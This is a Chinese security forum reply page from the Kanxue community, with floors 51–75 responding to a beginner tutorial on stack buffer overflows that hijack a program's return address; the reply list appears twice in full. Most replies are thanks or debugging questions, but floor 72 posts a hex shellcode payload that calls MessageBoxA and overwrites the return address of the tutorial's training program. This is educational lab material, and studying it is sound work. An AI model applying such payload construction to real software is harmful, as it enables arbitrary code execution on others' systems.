[技术专题]软件漏洞分析入门_4_初级栈溢出C_修改程序流程-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[技术专题]软件漏洞分析入门_4_初级栈溢出C_修改程序流程

发表于: 2007-12-15 01:01 35636

[技术专题]软件漏洞分析入门_4_初级栈溢出C_修改程序流程

failwest

2007-12-15 01:01

35636

查看主题内容

收藏・21

免费・7

支持

最新回复 (90) ◀ 1 2 3 4 ▶
书生lee 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	书生lee 51 楼将password.txt保存后，用OllyDbg加载程序并调试，可以看到最终的栈状态如下表所示：这是啥意思啊?怎么加载? 我很菜...不号意思... 2007-12-28 20:03 0
书生lee 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	书生lee 52 楼又研究一晚上,..还是不明白..我已经填好PASSWORA把程序将跳转到验证通过的分支位置搞好了,但是如何....加载? 2007-12-29 00:32 0
尼摩nemo 雪币： 200 能力值： (RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	尼摩nemo 53 楼 [QUOTE=failwest;392030] 局部变量名内存地址偏移3处的值偏移2处的值偏移1处的值偏移0处的值 buffer[0~3] 0x0012FB14 0x31 (‘1’) 0x32 (‘2’) 0x33 (‘3’) 0x34 (‘4’) buffer[4~7] 0x0012FB18 0x31 (‘1’) 0x32 (‘2’) 0x33 (‘3’) 0x34 (‘4’)[/QUOTE] 本来以为内存字节顺序写反了，仔细一看，原来是偏移大的在前面，哈哈…… 讲得很透彻，辛苦了 2007-12-29 14:44 0
tjszlqq 雪币： 1346 活跃值： (2331) 能力值： ( LV4，RANK：50 ) 在线值：发帖 46 回帖 885 粉丝 2 关注私信	tjszlqq 1 54 楼真正的高人啊！ 2008-1-2 12:33 0
zhtjia 雪币： 248 活跃值： (42) 能力值： ( LV2，RANK：10 ) 在线值：发帖 43 回帖 232 粉丝 0 关注私信	zhtjia 55 楼真的牛人,顶... 2008-1-2 13:50 0
ljseven 雪币： 223 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 29 粉丝 0 关注私信	ljseven 56 楼学习，感谢！ 2008-1-2 20:14 0
shinechou 雪币： 236 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 72 粉丝 0 关注私信	shinechou 57 楼大侠辛苦了，太棒了，希望能继续啊！ 2008-1-10 17:43 0
eanson 雪币： 207 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 2 回帖 23 粉丝 0 关注私信	eanson 1 58 楼 [QUOTE=黑色猎鹰;392577]明天等着做沙发？？顺便问下，为什么：仍然出于字节对齐、容易辨认的目的，我们将“4321”作为一个输入单元。 buffer[8]共需要2个这样的单元第3个输入单元将authenticated覆盖第4个输入单元将前栈帧EBP值覆盖第5个输入单元将返回地址覆盖这个是怎么得到的啊？？？是根据程序默认的处理还是用OD调试的好象本文没说怎么个"通过动态调试，发现栈帧中的变量分布情况基本没变。这样我们就可以按照如下方法构造password.txt中的数据："...[/QUOTE] 同问楼主，如何通过动态调试，弄清楚栈帧中的变量分布情况？感觉这是关键。谢谢楼主的好文！ 2008-1-17 12:14 0
bruclan 雪币： 229 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 30 粉丝 0 关注私信	bruclan 59 楼哈哈，成功，真的感觉受益匪浅，谢谢楼主无私奉献的国际共产主义精神，我会继续努力学校去的 2008-1-18 23:11 0
Macinsh 雪币： 125 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 36 粉丝 0 关注私信	Macinsh 60 楼好帖,学习! 2008-1-19 15:12 0
xujiejun 雪币： 213 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 12 粉丝 0 关注私信	xujiejun 61 楼受益匪浅啊 2008-1-21 23:13 0
sdmhfeng 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 9 粉丝 0 关注私信	sdmhfeng 62 楼太好了，正在学习。 2008-1-24 18:47 0
俊虎雪币： 217 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 133 粉丝 0 关注私信	俊虎 63 楼根据指导，自己动手丰衣足食 2008-1-24 21:18 0
高亮雪币： 171 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 14 回帖 86 粉丝 0 关注私信	高亮 64 楼晕，一直以为int是16位的，原来是32,自己的基础不牢哦~ 遇到这样的帖子就要狂顶！又学习了 ps: 啊哈哈哈，我做最后一排;( 2008-1-25 17:55 0
creatorwm 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 15 粉丝 0 关注私信	creatorwm 65 楼谢谢楼主分享了说的很详细啊偶学习了 2008-1-27 16:02 0
svszmh 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	svszmh 66 楼厉害,真厉害 2008-1-27 16:12 0
Fido 雪币： 107 活跃值： (404) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 1019 粉丝 1 关注私信	Fido 67 楼楼主的代码风格我是不敢苟同的。。。也许你在编译选项里面已经加了STDLIB.H 但是我们确实如果VC6.0来编译的话，缺少stdlib.h头，报错为exit函数未定义不喜欢你MAIN函数前不加VOID，，，不喜欢你MAIN函数里不加RETRUN。。。技术水平我倒是膜拜了！ 2008-2-4 17:15 0
流水寒雪币： 1 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 16 粉丝 0 关注私信	流水寒 68 楼慢慢的学习中谢谢了 2008-2-4 22:46 0
task 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 42 粉丝 0 关注私信	task 69 楼怎么不行啊?在DOS下搞出这个E:\sun\a>cl a2.cpp Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 12.00.8168 for 80x86 Copyright (C) Microsoft Corp 1984-1998. All rights reserved. a2.cpp a2.cpp(7) : error C2065: 'strcmp' : undeclared identifier a2.cpp(8) : error C2065: 'strcpy' : undeclared identifier a2.cpp(18) : error C2065: 'exit' : undeclared identifier a2.cpp(31) : warning C4508: 'main' : function should return a value; 'void' retu rn type assumed 2008-2-25 15:59 0
三根火柴雪币： 268 活跃值： (40) 能力值： ( LV10，RANK：170 ) 在线值：发帖 32 回帖 255 粉丝 0 关注私信	三根火柴 4 70 楼学到第三节了，吱一声 2008-3-3 17:49 0
ziffer 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 11 粉丝 0 关注私信	ziffer 71 楼我想问一下：OllyDbg 的调用堆栈窗口怎样才能总是前端显示呢，现在只要一点其它地方或步进窗口就跑到后面去了，好麻烦啊望同志们指点一下阿 2008-3-7 18:00 0
wsyzyddd 雪币： 215 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 13 回帖 124 粉丝 0 关注私信	wsyzyddd 1 72 楼赞一个先! 附上我的解决方案(MS已经落伍了..) Mr.failwest的exploit1=1152921504606846977D(2进制1000000000000000000000000000000000000000000000000000000000001B) Mr.failwest的exploit2= 60 33 DB 53 68 67 6E 61 6C 68 6F 61 69 78 8b c4 53 50 50 53 B8 8A 05 D5 77 FF D0 61 FF 25 18 11 40 90 90 90 90 90 90 90 90 90 90 90 90 90 6C 10 40 90 90 90 90 f0 fa 12 00 (最后一位,- -，郁闷死) PS:MessageBoxA=77d5058a 2008-3-18 00:45 0
cyndyli 雪币： 212 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 64 粉丝 0 关注私信	cyndyli 73 楼成功，辛苦failwest 2008-3-28 14:40 0
ZSYL 雪币： 16 活跃值： (430) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 198 粉丝 0 关注私信	ZSYL 74 楼听君一席话，胜读十年书 2008-5-23 03:24 0
ZSYL 雪币： 16 活跃值： (430) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 198 粉丝 0 关注私信	ZSYL 75 楼听君一席话，胜读十年书 2008-5-23 03:25 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

failwest

发帖

回帖

330

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (90) ◀ 1 2 3 4 ▶
书生lee 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	书生lee 51 楼将password.txt保存后，用OllyDbg加载程序并调试，可以看到最终的栈状态如下表所示：这是啥意思啊?怎么加载? 我很菜...不号意思... 2007-12-28 20:03 0
书生lee 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	书生lee 52 楼又研究一晚上,..还是不明白..我已经填好PASSWORA把程序将跳转到验证通过的分支位置搞好了,但是如何....加载? 2007-12-29 00:32 0
尼摩nemo 雪币： 200 能力值： (RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	尼摩nemo 53 楼 [QUOTE=failwest;392030] 局部变量名内存地址偏移3处的值偏移2处的值偏移1处的值偏移0处的值 buffer[0~3] 0x0012FB14 0x31 (‘1’) 0x32 (‘2’) 0x33 (‘3’) 0x34 (‘4’) buffer[4~7] 0x0012FB18 0x31 (‘1’) 0x32 (‘2’) 0x33 (‘3’) 0x34 (‘4’)[/QUOTE] 本来以为内存字节顺序写反了，仔细一看，原来是偏移大的在前面，哈哈…… 讲得很透彻，辛苦了 2007-12-29 14:44 0
tjszlqq 雪币： 1346 活跃值： (2331) 能力值： ( LV4，RANK：50 ) 在线值：发帖 46 回帖 885 粉丝 2 关注私信	tjszlqq 1 54 楼真正的高人啊！ 2008-1-2 12:33 0
zhtjia 雪币： 248 活跃值： (42) 能力值： ( LV2，RANK：10 ) 在线值：发帖 43 回帖 232 粉丝 0 关注私信	zhtjia 55 楼真的牛人,顶... 2008-1-2 13:50 0
ljseven 雪币： 223 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 29 粉丝 0 关注私信	ljseven 56 楼学习，感谢！ 2008-1-2 20:14 0
shinechou 雪币： 236 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 72 粉丝 0 关注私信	shinechou 57 楼大侠辛苦了，太棒了，希望能继续啊！ 2008-1-10 17:43 0
eanson 雪币： 207 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 2 回帖 23 粉丝 0 关注私信	eanson 1 58 楼 [QUOTE=黑色猎鹰;392577]明天等着做沙发？？顺便问下，为什么：仍然出于字节对齐、容易辨认的目的，我们将“4321”作为一个输入单元。 buffer[8]共需要2个这样的单元第3个输入单元将authenticated覆盖第4个输入单元将前栈帧EBP值覆盖第5个输入单元将返回地址覆盖这个是怎么得到的啊？？？是根据程序默认的处理还是用OD调试的好象本文没说怎么个"通过动态调试，发现栈帧中的变量分布情况基本没变。这样我们就可以按照如下方法构造password.txt中的数据："...[/QUOTE] 同问楼主，如何通过动态调试，弄清楚栈帧中的变量分布情况？感觉这是关键。谢谢楼主的好文！ 2008-1-17 12:14 0
bruclan 雪币： 229 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 30 粉丝 0 关注私信	bruclan 59 楼哈哈，成功，真的感觉受益匪浅，谢谢楼主无私奉献的国际共产主义精神，我会继续努力学校去的 2008-1-18 23:11 0
Macinsh 雪币： 125 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 36 粉丝 0 关注私信	Macinsh 60 楼好帖,学习! 2008-1-19 15:12 0
xujiejun 雪币： 213 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 12 粉丝 0 关注私信	xujiejun 61 楼受益匪浅啊 2008-1-21 23:13 0
sdmhfeng 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 9 粉丝 0 关注私信	sdmhfeng 62 楼太好了，正在学习。 2008-1-24 18:47 0
俊虎雪币： 217 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 133 粉丝 0 关注私信	俊虎 63 楼根据指导，自己动手丰衣足食 2008-1-24 21:18 0
高亮雪币： 171 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 14 回帖 86 粉丝 0 关注私信	高亮 64 楼晕，一直以为int是16位的，原来是32,自己的基础不牢哦~ 遇到这样的帖子就要狂顶！又学习了 ps: 啊哈哈哈，我做最后一排;( 2008-1-25 17:55 0
creatorwm 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 15 粉丝 0 关注私信	creatorwm 65 楼谢谢楼主分享了说的很详细啊偶学习了 2008-1-27 16:02 0
svszmh 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	svszmh 66 楼厉害,真厉害 2008-1-27 16:12 0
Fido 雪币： 107 活跃值： (404) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 1019 粉丝 1 关注私信	Fido 67 楼楼主的代码风格我是不敢苟同的。。。也许你在编译选项里面已经加了STDLIB.H 但是我们确实如果VC6.0来编译的话，缺少stdlib.h头，报错为exit函数未定义不喜欢你MAIN函数前不加VOID，，，不喜欢你MAIN函数里不加RETRUN。。。技术水平我倒是膜拜了！ 2008-2-4 17:15 0
流水寒雪币： 1 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 16 粉丝 0 关注私信	流水寒 68 楼慢慢的学习中谢谢了 2008-2-4 22:46 0
task 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 42 粉丝 0 关注私信	task 69 楼怎么不行啊?在DOS下搞出这个E:\sun\a>cl a2.cpp Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 12.00.8168 for 80x86 Copyright (C) Microsoft Corp 1984-1998. All rights reserved. a2.cpp a2.cpp(7) : error C2065: 'strcmp' : undeclared identifier a2.cpp(8) : error C2065: 'strcpy' : undeclared identifier a2.cpp(18) : error C2065: 'exit' : undeclared identifier a2.cpp(31) : warning C4508: 'main' : function should return a value; 'void' retu rn type assumed 2008-2-25 15:59 0
三根火柴雪币： 268 活跃值： (40) 能力值： ( LV10，RANK：170 ) 在线值：发帖 32 回帖 255 粉丝 0 关注私信	三根火柴 4 70 楼学到第三节了，吱一声 2008-3-3 17:49 0
ziffer 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 11 粉丝 0 关注私信	ziffer 71 楼我想问一下：OllyDbg 的调用堆栈窗口怎样才能总是前端显示呢，现在只要一点其它地方或步进窗口就跑到后面去了，好麻烦啊望同志们指点一下阿 2008-3-7 18:00 0
wsyzyddd 雪币： 215 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 13 回帖 124 粉丝 0 关注私信	wsyzyddd 1 72 楼赞一个先! 附上我的解决方案(MS已经落伍了..) Mr.failwest的exploit1=1152921504606846977D(2进制1000000000000000000000000000000000000000000000000000000000001B) Mr.failwest的exploit2= 60 33 DB 53 68 67 6E 61 6C 68 6F 61 69 78 8b c4 53 50 50 53 B8 8A 05 D5 77 FF D0 61 FF 25 18 11 40 90 90 90 90 90 90 90 90 90 90 90 90 90 6C 10 40 90 90 90 90 f0 fa 12 00 (最后一位,- -，郁闷死) PS:MessageBoxA=77d5058a 2008-3-18 00:45 0
cyndyli 雪币： 212 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 64 粉丝 0 关注私信	cyndyli 73 楼成功，辛苦failwest 2008-3-28 14:40 0
ZSYL 雪币： 16 活跃值： (430) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 198 粉丝 0 关注私信	ZSYL 74 楼听君一席话，胜读十年书 2008-5-23 03:24 0
ZSYL 雪币： 16 活跃值： (430) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 198 粉丝 0 关注私信	ZSYL 75 楼听君一席话，胜读十年书 2008-5-23 03:25 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复